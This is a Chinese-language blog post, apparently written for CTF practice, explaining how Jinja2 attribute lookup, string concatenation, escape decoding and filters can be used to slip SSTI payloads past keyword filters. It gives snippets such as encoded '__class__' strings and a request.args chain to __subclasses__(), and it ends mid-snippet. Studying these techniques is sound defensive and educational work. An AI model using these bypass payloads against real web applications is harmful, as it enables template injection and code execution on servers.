<!DOCTYPE html>
<html lang="zh-CN">
<head>

    <!--[if lt IE 9]>
        <style>body {display: none; background: none !important} </style>
        <meta http-equiv="Refresh" Content="0; url=//outdatedbrowser.com/" />
    <![endif]-->

<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
<meta name="format-detection" content="telephone=no" />
<meta name="author" content="lexsd6" />



<meta name="description" content="之前写了一篇关于python ssti的文章,但在分析时过于肤浅地将重心放在python与flask上,从而完全忽视了对jinja2的深入探讨。实际上我们在flask中用{ {与{ %在进行执行python逃逸时并不是直接给python引擎处理,而是要先经过jinja2’渲染’一道.因此这是对之前不足的整理.">
<meta property="og:type" content="article">
<meta property="og:title" content="关于jinja2特性对ssti的bypass的影响">
<meta property="og:url" content="lexsd6.github.io/2020/11/27/%E5%85%B3%E4%BA%8Ejinja%E7%89%B9%E6%80%A7%E5%AF%B9ssti%E7%9A%84bypass%E7%9A%84%E5%BD%B1%E5%93%8D/index.html">
<meta property="og:site_name" content="lexsd6&#39;s home">
<meta property="og:description" content="之前写了一篇关于python ssti的文章,但在分析时过于肤浅地将重心放在python与flask上,从而完全忽视了对jinja2的深入探讨。实际上我们在flask中用{ {与{ %在进行执行python逃逸时并不是直接给python引擎处理,而是要先经过jinja2’渲染’一道.因此这是对之前不足的整理.">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="lexsd6.github.io/2020/11/27/%E5%85%B3%E4%BA%8Ejinja%E7%89%B9%E6%80%A7%E5%AF%B9ssti%E7%9A%84bypass%E7%9A%84%E5%BD%B1%E5%93%8D/image-20210113123904191.png">
<meta property="article:published_time" content="2020-11-27T02:08:56.656Z">
<meta property="article:modified_time" content="2021-01-21T14:32:31.511Z">
<meta property="article:author" content="lexsd6">
<meta property="article:tag" content="python">
<meta property="article:tag" content="web">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="lexsd6.github.io/2020/11/27/%E5%85%B3%E4%BA%8Ejinja%E7%89%B9%E6%80%A7%E5%AF%B9ssti%E7%9A%84bypass%E7%9A%84%E5%BD%B1%E5%93%8D/image-20210113123904191.png">

<link rel="apple-touch-icon" href= "/apple-touch-icon.png">


    <link rel="alternate" href="/atom.xml" title="lexsd6&#39;s home" type="application/atom+xml">



    <link rel="shortcut icon" href="/favicon.png">



    <link href="//cdn.bootcss.com/animate.css/3.5.1/animate.min.css" rel="stylesheet">



    <link href="//cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.min.css" rel="stylesheet">



    <script src="//cdn.bootcss.com/pace/1.0.2/pace.min.js"></script>
    <link href="//cdn.bootcss.com/pace/1.0.2/themes/blue/pace-theme-minimal.css" rel="stylesheet">



<link rel="stylesheet" href="/css/style.css">




<link href="//cdn.bootcss.com/font-awesome/4.6.3/css/font-awesome.min.css" rel="stylesheet">


<title>关于jinja2特性对ssti的bypass的影响 | lexsd6&#39;s home</title>

<script src="//cdn.bootcss.com/jquery/2.2.4/jquery.min.js"></script>
<script src="//cdn.bootcss.com/clipboard.js/1.5.10/clipboard.min.js"></script>

<script>
    var yiliaConfig = {
        fancybox: true,
        animate: true,
        isHome: false,
        isPost: true,
        isArchive: false,
        isTag: false,
        isCategory: false,
        fancybox_js: "//cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.min.js",
        scrollreveal: "//cdn.bootcss.com/scrollReveal.js/3.1.4/scrollreveal.min.js",
        search: false
    }
</script>


    <script> yiliaConfig.jquery_ui = [false]; </script>



    <script> yiliaConfig.rootUrl = "\/";</script>






<meta name="generator" content="Hexo 4.2.0"></head>
<body>
  <div id="container">
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
    <header id="header" class="inner">
        <a href="/" class="profilepic">
            <img src="/img/lexsd6.png" class="animated zoomIn">
        </a>
        <hgroup>
          <h1 class="header-author"><a href="/">lexsd6</a></h1>
        </hgroup>

        
        <p class="header-subtitle"> Clumsy birds have to start flying early</p>
        

        


        
            <div id="switch-btn" class="switch-btn">
                <div class="icon">
                    <div class="icon-ctn">
                        <div class="icon-wrap icon-house" data-idx="0">
                            <div class="birdhouse"></div>
                            <div class="birdhouse_holes"></div>
                        </div>
                        <div class="icon-wrap icon-ribbon hide" data-idx="1">
                            <div class="ribbon"></div>
                        </div>
                        
                        <div class="icon-wrap icon-link hide" data-idx="2">
                            <div class="loopback_l"></div>
                            <div class="loopback_r"></div>
                        </div>
                        
                        
                        <div class="icon-wrap icon-me hide" data-idx="3">
                            <div class="user"></div>
                            <div class="shoulder"></div>
                        </div>
                        
                    </div>
                    
                </div>
                <div class="tips-box hide">
                    <div class="tips-arrow"></div>
                    <ul class="tips-inner">
                        <li>菜单</li>
                        <li>标签</li>
                        
                        <li>友情链接</li>
                        
                        
                        <li>关于我</li>
                        
                    </ul>
                </div>
            </div>
        

        <div id="switch-area" class="switch-area">
            <div class="switch-wrap">
                <section class="switch-part switch-part1">
                    <nav class="header-menu">
                        <ul>
                        
                            <li><a href="/">主页</a></li>
                        
                            <li><a href="/archives/">所有文章</a></li>
                        
                            <li><a href="/tags/">标签云</a></li>
                        
                        </ul>
                    </nav>
                    <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fa Email" href="mailto:lexsd6@foxmail.com" title="Email"></a>
                            
                                <a class="fa RSS" href="/atom.xml" title="RSS"></a>
                            
                                <a class="fa QQ" href="tencent://message/?uin=2927507170&Menu=yes" title="QQ"></a>
                            
                        </ul>
                    </nav>
                </section>
                
                
                <section class="switch-part switch-part2">
                    <div class="widget tagcloud" id="js-tagcloud">
                        <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/Linux/" rel="tag">Linux</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/crypto/" rel="tag">crypto</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/mics/" rel="tag">mics</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/mysql/" rel="tag">mysql</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/php/" rel="tag">php</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/pwn/" rel="tag">pwn</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/python/" rel="tag">python</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/sql/" rel="tag">sql</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/web/" rel="tag">web</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/wp/" rel="tag">wp</a></li></ul>
                    </div>
                </section>
                
                
                
                <section class="switch-part switch-part3">
                    <div id="js-friends">
                    
                      <a class="main-nav-link switch-friends-link" href="https://hexo.io" target="_blank" rel="noopener">Hexo</a>
                    
                      <a class="main-nav-link switch-friends-link" href="https://pages.github.com/" target="_blank" rel="noopener">GitHub</a>
                    
                      <a class="main-nav-link switch-friends-link" href="http://moxfive.xyz/" target="_blank" rel="noopener">MOxFIVE</a>
                    
                    </div>
                </section>
                

                
                
                <section class="switch-part switch-part4">
                
                    <div id="js-aboutme">一梦想成为五边形战士的老菜鸡</div>
                </section>
                
            </div>
        </div>
    </header>                
</div>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
      <div class="overlay">
          <div class="slider-trigger"></div>
          <h1 class="header-author js-mobile-header hide"><a href="/" title="回到主页">lexsd6</a></h1>
      </div>
    <div class="intrude-less">
        <header id="header" class="inner">
            <a href="/" class="profilepic">
                <img src="/img/lexsd6.png" class="animated zoomIn">
            </a>
            <hgroup>
              <h1 class="header-author"><a href="/" title="回到主页">lexsd6</a></h1>
            </hgroup>
            
            <p class="header-subtitle"> Clumsy birds have to start flying early</p>
            
            <nav class="header-menu">
                <ul>
                
                    <li><a href="/">主页</a></li>
                
                    <li><a href="/archives/">所有文章</a></li>
                
                    <li><a href="/tags/">标签云</a></li>
                
                <div class="clearfix"></div>
                </ul>
            </nav>
            <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fa Email" target="_blank" href="mailto:lexsd6@foxmail.com" title="Email"></a>
                            
                                <a class="fa RSS" target="_blank" href="/atom.xml" title="RSS"></a>
                            
                                <a class="fa QQ" target="_blank" href="tencent://message/?uin=2927507170&Menu=yes" title="QQ"></a>
                            
                        </ul>
            </nav>
        </header>                
    </div>
    <link class="menu-list" tags="标签" friends="友情链接" about="关于我"/>
</nav>
      <div class="body-wrap"><article id="post-关于jinja特性对ssti的bypass的影响" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2020/11/27/%E5%85%B3%E4%BA%8Ejinja%E7%89%B9%E6%80%A7%E5%AF%B9ssti%E7%9A%84bypass%E7%9A%84%E5%BD%B1%E5%93%8D/" class="article-date">
      <time datetime="2020-11-27T02:08:56.656Z" itemprop="datePublished">2020-11-27</time>
</a>


    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy" />
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      关于jinja2特性对ssti的bypass的影响
    </h1>
  

      </header>
      
      <div class="article-info article-info-post">
        
    <div class="article-category tagcloud">
    <a class="article-category-link" href="/categories/CTF/">CTF</a>
    </div>


        
    <div class="article-tag tagcloud">
        <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/python/" rel="tag">python</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/web/" rel="tag">web</a></li></ul>
    </div>

        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
          
        <p>之前写了一篇关于<a href="https://lexsd6.github.io/2020/03/27/python%20%E5%85%B3%E4%BA%8E%E6%B2%99%E7%9B%92%E9%80%83%E9%80%B8%E7%9A%84%E6%80%9D%E8%80%83/">python ssti</a>的文章,但在分析时过于肤浅地将重心放在python与flask上,从而完全忽视了对jinja2的深入探讨。实际上我们在flask中用<code>{ {</code>与<code>{ %</code>在进行执行python逃逸时并不是直接给python引擎处理,而是要先经过jinja2’渲染’一道.因此这是对之前不足的整理.<a id="more"></a></p>
<p><img src="image-20210113123904191.png" alt="image-20210113123904191"></p>
<h1 id="jinja2特性"><a href="#jinja2特性" class="headerlink" title="jinja2特性"></a>jinja2特性</h1><h2 id="变量属性"><a href="#变量属性" class="headerlink" title="变量属性"></a>变量属性</h2><p>在python中,我们常常是通过<code>.</code>来获取变量的属性的.例如<code>().__class__</code>.</p>
<p>但jinja2给我们提供了另外两种思路：<code>[]</code>与<code>|attr</code></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#[]用法</span></span><br><span class="line">()[<span class="string">'__class__'</span>]</span><br><span class="line"><span class="comment">#|attr用法</span></span><br><span class="line">()|attr(<span class="string">'__class__'</span>)</span><br></pre></td></tr></table></figure>

<p>这里要值得注意的是纯python中<code>.</code>只有取对象属性的意思。但在jinja2下：`</p>
<p><code>xx.__class__</code>会先检测<code>x</code>对象有没有名为<code>__class__</code>的属性，若没会<strong>继续</strong>检测<code>xx</code>对象有没有名为<code>__class__</code>的这一项元素。如果没有，返回一个未定义对象。</p>
<p>但<code>xx[&#39;__class__&#39;]</code>确是：</p>
<p><code>xx[&#39;__class__&#39;]</code>会先检测<code>x</code>对象有没有名为<code>__class__</code>的这一项元素，若没会<strong>继续</strong>检测<code>xx</code>对象有没有名为<code>__class__</code>的这属性。如果没有，返回一个未定义对象。</p>
<p>而<code>xx|attr(&#39;__class__&#39;)</code>这个它只查找属性，如果没有返回一个未定义对象。</p>
<p>来举个栗子：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#纯python交换行下</span></span><br><span class="line"><span class="meta">&gt;&gt;&gt; </span>&#123;<span class="string">'pop'</span>:<span class="number">1</span>&#125;.pop</span><br><span class="line">&lt;built-<span class="keyword">in</span> method pop of dict object at <span class="number">0x000001A352BF8778</span>&gt;</span><br><span class="line"></span><br><span class="line"><span class="meta">&gt;&gt;&gt; </span>&#123;<span class="string">'po'</span>:<span class="string">'1'</span>&#125;.po</span><br><span class="line">Traceback (most recent call last):</span><br><span class="line">  File <span class="string">"&lt;stdin&gt;"</span>, line <span class="number">1</span>, <span class="keyword">in</span> &lt;module&gt;</span><br><span class="line">AttributeError: <span class="string">'dict'</span> object has no attribute <span class="string">'po'</span></span><br><span class="line">    </span><br><span class="line"><span class="comment">#jinja2 中,xx.__class__ 式:</span></span><br><span class="line"></span><br><span class="line">&#123;&#123;  &#123;<span class="string">'pop'</span>:<span class="string">'1'</span>&#125;.pop   &#125;&#125;</span><br><span class="line">&lt;built-<span class="keyword">in</span> method pop of dict object at <span class="number">0x7fbec74f0050</span>&gt;</span><br><span class="line"></span><br><span class="line">&#123;&#123;  &#123;<span class="string">'po'</span>:<span class="string">'1'</span>&#125;.po  &#125;&#125;</span><br><span class="line"><span class="number">1</span></span><br><span class="line"><span class="comment">#jinja2 中,xx['__class__'] 式:</span></span><br><span class="line"></span><br><span class="line">&#123;&#123;&#123;<span class="string">'pop'</span>:<span class="string">'1'</span>&#125;[<span class="string">'pop'</span>]&#125;&#125;</span><br><span class="line"><span class="number">1</span> </span><br><span class="line">&#123;&#123;&#123;<span class="string">'po'</span>:<span class="string">'1'</span>&#125;[<span class="string">'po'</span>]&#125;&#125;</span><br><span class="line"><span class="number">1</span> </span><br><span class="line"></span><br><span class="line">&#123;&#123;  &#123;<span class="string">'pop'</span>:<span class="string">'1'</span>&#125;|attr(<span class="string">'pop'</span>)  &#125;&#125;</span><br><span class="line">     <span class="comment">#(一个未定义对象)</span></span><br><span class="line">&lt;built-<span class="keyword">in</span> method pop of dict object at <span class="number">0x7fbec74edd70</span>&gt; </span><br><span class="line">&#123;&#123;  &#123;<span class="string">'po'</span>:<span class="string">'1'</span>&#125;|attr(<span class="string">'po'</span>)  &#125;&#125;</span><br><span class="line">     <span class="comment">#(一个未定义对象)</span></span><br></pre></td></tr></table></figure>

<h2 id="变量赋值"><a href="#变量赋值" class="headerlink" title="变量赋值"></a>变量赋值</h2><p>在jinji的渲染中，变量不能随意地被赋值。</p>
<p>变量赋值只能通过<code>{ % set x=xxx % }</code>来进行赋值，在<code>{ { } }</code>中只能使用变量而不能定义赋值变量。</p>
<h2 id="字符串拼接"><a href="#字符串拼接" class="headerlink" title="字符串拼接"></a>字符串拼接</h2><p>在纯python中我们习惯用<code>+</code>来拼接字符串。</p>
<p>但在jinja2中我们还可以用<code>~</code>来拼接字符串。是<code>~</code>会把所有的操作数转换为字符串，并且连接它们。因此要注意的是：</p>
<p>1。操作数本来就是字符串，<code>~</code>会像<code>+</code>一样拼接它们。 </p>
<p><code>{ { &quot;Hello&quot; ~ &quot;name&quot; ~ &quot;!&quot; } }</code> 会返回： <code>Helloname!</code></p>
<p>2。若操作数是一个定义了且有值的变量名,<code>~</code>会用它的值来和其他字符串一起拼接。</p>
<p><code>Helloundefined!</code> 会返回（假设 name 值为 ‘lexsd6’ ）： <code>Hellolexsd6!</code></p>
<p>3。若操作数是一个定义了且为赋值或未定义的变量名,<code>~</code>会跳过ta用剩下的操作数来一起拼接。</p>
<p><code>{ { &quot;Hello&quot; ~ name ~ &quot;!&quot; } }</code> 会返回（假设 name  未定义 ）： <code>Hello!</code></p>
<p>4。若操作数是一个数字 or 元组 or 字典 or 列表 等常数 将直接转化为字符串来和其他操作数拼接。</p>
<p><code>{ { &quot;Hello&quot; ~ 1 ~ &quot;!&quot; } }</code> 会返回： <code>Hello1!</code></p>
<p><code>{ { &quot;Hello&quot; ~ (1,2) ~ &quot;!&quot; } }</code> 会返回： <code>Hello(1,2)!</code></p>
<p><code>{ { &quot;Hello&quot; ~ {1:2} ~ &quot;!&quot; } }</code> 会返回： <code>Hello{1,2}!</code></p>
<p><code>{ { &quot;Hello&quot; ~ [1,2] ~ &quot;!&quot; } }</code> 会返回： <code>Hello[1,2]!</code></p>
<h2 id="字符串转码"><a href="#字符串转码" class="headerlink" title="字符串转码"></a>字符串转码</h2><p>字符转码是一个web模板常有的东西。但通常都是url编码的转化。</p>
<p>但在jinja2中，还可以自动将16进制，8进制，unicode编码的字符串转码。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># \xXX</span></span><br><span class="line"><span class="string">'\x5F\x5F\x63\x6C\x61\x73\x73\x5F\x5F'</span> ==<span class="string">'__class__'</span></span><br><span class="line"><span class="comment">#\000</span></span><br><span class="line"><span class="string">'\137\137\143\154\141\163\163\137\137'</span>==<span class="string">'__class__'</span></span><br><span class="line"><span class="comment">#\uXXX</span></span><br><span class="line"><span class="string">'\u005F\u005F\u0063\u006C\u0061\u0073\u0073\u005F\u005F'</span>==<span class="string">'__class__'</span></span><br><span class="line"><span class="comment">#\uXXXXXXXX</span></span><br><span class="line"><span class="string">'\U0000005F\U0000005F\U00000063\U0000006C\U00000061\U00000073\U00000073\U0000005F\U0000005F'</span>==<span class="string">'__class__'</span></span><br></pre></td></tr></table></figure>

<h2 id="过滤器机制"><a href="#过滤器机制" class="headerlink" title="过滤器机制"></a>过滤器机制</h2><p>在jinji2中有一种独特的调用机制,这种机制本意是用来对<code>{ {</code>与<code>{ %</code>中的数据进行筛选或类型转化的. 过滤器通过<code>|</code>来调用它们.例如<code>|attr()</code>就是一个典型的过滤器.</p>
<h3 id="attr"><a href="#attr" class="headerlink" title="|attr"></a>|attr</h3><p>之前已经说过，这是对 ‘对象’ 取属性的 过滤器。这里再强调下<code>|attr</code><strong>只查找属性</strong>.</p>
<h3 id="float"><a href="#float" class="headerlink" title="|float"></a>|float</h3><p>若在<code>|</code>对对象是纯数字的字符串前将非浮点数型的数字字符则将其转化为浮点数.否则将括号类的字符转换为浮点型(若没有参数返回<code>0.0</code>).同时<code>|</code>符合要求时括号可以简写.</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">'1'</span>|float()  <span class="comment"># 1.0</span></span><br><span class="line"><span class="string">'1'</span>|float  <span class="comment"># 1.0</span></span><br><span class="line"><span class="number">1</span>|float()  <span class="comment"># 1.0</span></span><br><span class="line"><span class="number">1</span>|float  <span class="comment"># 1.0</span></span><br><span class="line">[<span class="number">1</span>]|float(<span class="number">1</span>) <span class="comment">#1.0</span></span><br><span class="line">[<span class="number">1</span>]|float() <span class="comment">#0.0</span></span><br><span class="line">[<span class="number">1</span>]|float <span class="comment">#0.0</span></span><br></pre></td></tr></table></figure>

<h3 id="format"><a href="#format" class="headerlink" title="|format"></a>|format</h3><p>纯python中format在jinja中同样可以但jinjia提供格外的<code>|format</code>方法。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123; <span class="string">"%s - %s"</span>|format(<span class="string">"lexs"</span>, <span class="string">"d6!"</span>) &#125;&#125; <span class="comment">#lexs-d6!</span></span><br></pre></td></tr></table></figure>

<h3 id="join"><a href="#join" class="headerlink" title="|join"></a>|join</h3><p>返回一个字符串，该字符串是序列中字符串的串联。元素之间的分隔符默认为空字符串，可以使用可选参数定义字符串。(ps:如果对象是字典，则只拼接 <strong>键</strong> )</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;[<span class="number">1</span>,<span class="string">'a'</span>,b]|join&#125;&#125; <span class="comment">#1a</span></span><br><span class="line">&#123;&#123;[<span class="number">1</span>,<span class="string">'a'</span>,b]|join(<span class="number">3</span>)&#125;&#125; <span class="comment">#13a3</span></span><br><span class="line">&#123;&#123;  &#123;<span class="string">'a'</span>:<span class="number">1</span>,<span class="string">'b'</span>:<span class="number">2</span>&#125;|join&#125;&#125; <span class="comment">#ab</span></span><br></pre></td></tr></table></figure>

<h3 id="last"><a href="#last" class="headerlink" title="|last"></a>|last</h3><p>取一个字符串，元组，列表的最后一项。（高版本的字典不行）</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;<span class="string">'1234'</span>|last()&#125;&#125;<span class="comment">#4</span></span><br><span class="line">&#123;&#123;(<span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="number">4</span>)|last()&#125;&#125; <span class="comment">#4</span></span><br><span class="line">&#123;&#123;[<span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="number">4</span>]|last()&#125;&#125;<span class="comment">#4</span></span><br></pre></td></tr></table></figure>



<h3 id="list"><a href="#list" class="headerlink" title="|list"></a>|list</h3><p>将值转换为列表.如果是字符串，则返回的列表将是字符列表。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1</span>,%<span class="number">27</span>a%<span class="number">27</span>,b|list <span class="comment">#(1, 'a', [])</span></span><br><span class="line">&#123;&#123;<span class="string">'abc'</span>|list&#125;&#125; <span class="comment">#['a', 'b', 'c']</span></span><br></pre></td></tr></table></figure>

<h3 id="lower"><a href="#lower" class="headerlink" title="|lower"></a>|lower</h3><p>将大写字母转换为小写字母.</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;<span class="string">'ＣＬＡＳＳ'</span>|lower()&#125;&#125; <span class="comment">#ｃｌａｓｓ</span></span><br></pre></td></tr></table></figure>



<h3 id="string"><a href="#string" class="headerlink" title="|string"></a>|string</h3><p>如果对象不是字符串则转换为字符串.</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;<span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="number">4</span>|string&#125;&#125; <span class="comment"># (1, 2, 3, '4')</span></span><br></pre></td></tr></table></figure>

<h3 id="replace"><a href="#replace" class="headerlink" title="|replace"></a>|replace</h3><p>对对象中出现的字符串进行替代。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;<span class="string">'fl4g'</span>|replace(<span class="string">'4'</span>,<span class="string">'a'</span>)&#125;&#125; <span class="comment">#flag</span></span><br></pre></td></tr></table></figure>



<h2 id="内置函数"><a href="#内置函数" class="headerlink" title="内置函数"></a>内置函数</h2><p>在jinja的<code>{ {</code>与<code>{ %</code>中虽然环境中其实也有全局函数存在的。</p>
<p>如range，lipsum，dict，cycler，reset，next，current，joiner。</p>
<p>这些函数大多用法和纯python差不多，而且是以<strong>类</strong>来定义，在ssti中大多都是<code>xxx.__class__</code>工具人。但要提下<strong>dict</strong>。</p>
<h3 id="dict"><a href="#dict" class="headerlink" title="dict"></a>dict</h3><p>在jinja2中 {‘foo’ : ‘bar’} 与 dict(foo=bar) 等价。(凭空生字符串)</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;dict(lexs=<span class="number">0</span>)&#125;&#125; <span class="comment">#  &#123;'lexs': 0&#125;</span></span><br></pre></td></tr></table></figure>

<h1 id="bypass"><a href="#bypass" class="headerlink" title="bypass"></a>bypass</h1><h3 id="参数关键词字符过滤"><a href="#参数关键词字符过滤" class="headerlink" title="参数关键词字符过滤"></a>参数关键词字符过滤</h3><h4 id="字符拼接"><a href="#字符拼接" class="headerlink" title="字符拼接"></a>字符拼接</h4><p>利用<code>+</code>与<code>~</code>来进行字符串拼接操作。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">'__clas'</span>+<span class="string">'s__'</span></span><br><span class="line"><span class="string">'__clas'</span>~<span class="string">'s__'</span></span><br></pre></td></tr></table></figure>

<h4 id="字符替换"><a href="#字符替换" class="headerlink" title="字符替换"></a>字符替换</h4><p>用|replace来替换关键字</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;<span class="string">'fl4g'</span>|replace(<span class="string">'4'</span>,<span class="string">'a'</span>)&#125;&#125; <span class="comment">#flag</span></span><br></pre></td></tr></table></figure>

<h4 id="进行decode解编码绕过"><a href="#进行decode解编码绕过" class="headerlink" title="进行decode解编码绕过"></a>进行decode解编码绕过</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#base64 decode解编码</span></span><br><span class="line"><span class="string">''</span>[<span class="string">'X19jbGFzc19f'</span>.decode(<span class="string">'base64'</span>)] <span class="comment">#''.__class__</span></span><br><span class="line"><span class="comment">#hex decode解编码</span></span><br><span class="line"><span class="string">''</span>[<span class="string">'5f5f636c6173735f5f'</span>.decode(<span class="string">'hex'</span>)]<span class="comment">#''.__class__</span></span><br><span class="line"><span class="comment">#rot13 decode解编码</span></span><br><span class="line"><span class="string">''</span>[<span class="string">'__pynff__'</span>.decode(<span class="string">'rot13'</span>)]<span class="comment">#''.__class__</span></span><br></pre></td></tr></table></figure>

<h4 id="利用-string转化字符拼接绕过"><a href="#利用-string转化字符拼接绕过" class="headerlink" title="利用|string转化字符拼接绕过"></a>利用|string转化字符拼接绕过</h4><p>利用<code>|string</code>会对象转为字符串的特性。将一些内置对象转为字符串来拼接绕过。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;(x|select|string)[<span class="number">24</span>]~(x|select|string)[<span class="number">24</span>]~(x|select|string)[<span class="number">15</span>]~(x|select|string)[<span class="number">20</span>]~(x|select|string)[<span class="number">6</span>]~(x|select|string)[<span class="number">18</span>]~(x|select|string)[<span class="number">18</span>]~(x|select|string)[<span class="number">24</span>]~(x|select|string)[<span class="number">24</span>]&#125;&#125;<span class="comment">#__class__</span></span><br></pre></td></tr></table></figure>

<h4 id="利用-join来提取"><a href="#利用-join来提取" class="headerlink" title="利用|join来提取"></a>利用|join来提取</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;  [<span class="string">'f'</span>,<span class="string">'l'</span>,<span class="string">'a'</span>,<span class="string">'g'</span>]|join()    &#125;&#125;</span><br></pre></td></tr></table></figure>

<h4 id="利用request-args，request-values进行传参"><a href="#利用request-args，request-values进行传参" class="headerlink" title="利用request.args，request.values进行传参"></a>利用request.args，request.values进行传参</h4><figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;""[request.args.class][request.args.x1][request.args.x2][request.args.x3]()[40]&#125;&#125;?class=__class__&amp;x1=__base__&amp;x2=__base__&amp;x3=__subclasses__</span><br><span class="line"><span class="comment">#若’.’也被过滤可以用’[]’套娃方式代替</span></span><br><span class="line">&#123;&#123;""[request['args']['c']]&#125;&#125;?c=__class__</span><br></pre></td></tr></table></figure>

<h4 id="利用模板渲染编码绕过：（部分新版本）"><a href="#利用模板渲染编码绕过：（部分新版本）" class="headerlink" title="利用模板渲染编码绕过：（部分新版本）"></a>利用模板渲染编码绕过：（部分新版本）</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#16进制（\xXX）绕过。</span></span><br><span class="line"><span class="string">''</span>[<span class="string">'\x5F\x5F\x63\x6C\x61\x73\x73\x5F\x5F'</span>]  <span class="comment">#''.__class__</span></span><br><span class="line"><span class="comment">#8进制（\OOO）绕过。</span></span><br><span class="line"><span class="string">''</span>[<span class="string">'\137\137\143\154\141\163\163\137\137'</span>]  <span class="comment">#''.__class__</span></span><br><span class="line"><span class="comment">#unicode（\uXXXXor\UXXXXXXXX）绕过。</span></span><br><span class="line"><span class="comment">#\uX<span class="doctag">XXX:</span></span></span><br><span class="line">    <span class="string">''</span>[<span class="string">'\137\137\143\154\141\163\163\137\137'</span>]  <span class="comment">#''.__class__</span></span><br><span class="line"><span class="comment">#\UXXXXX<span class="doctag">XXX:</span></span></span><br><span class="line">    <span class="string">''</span>[<span 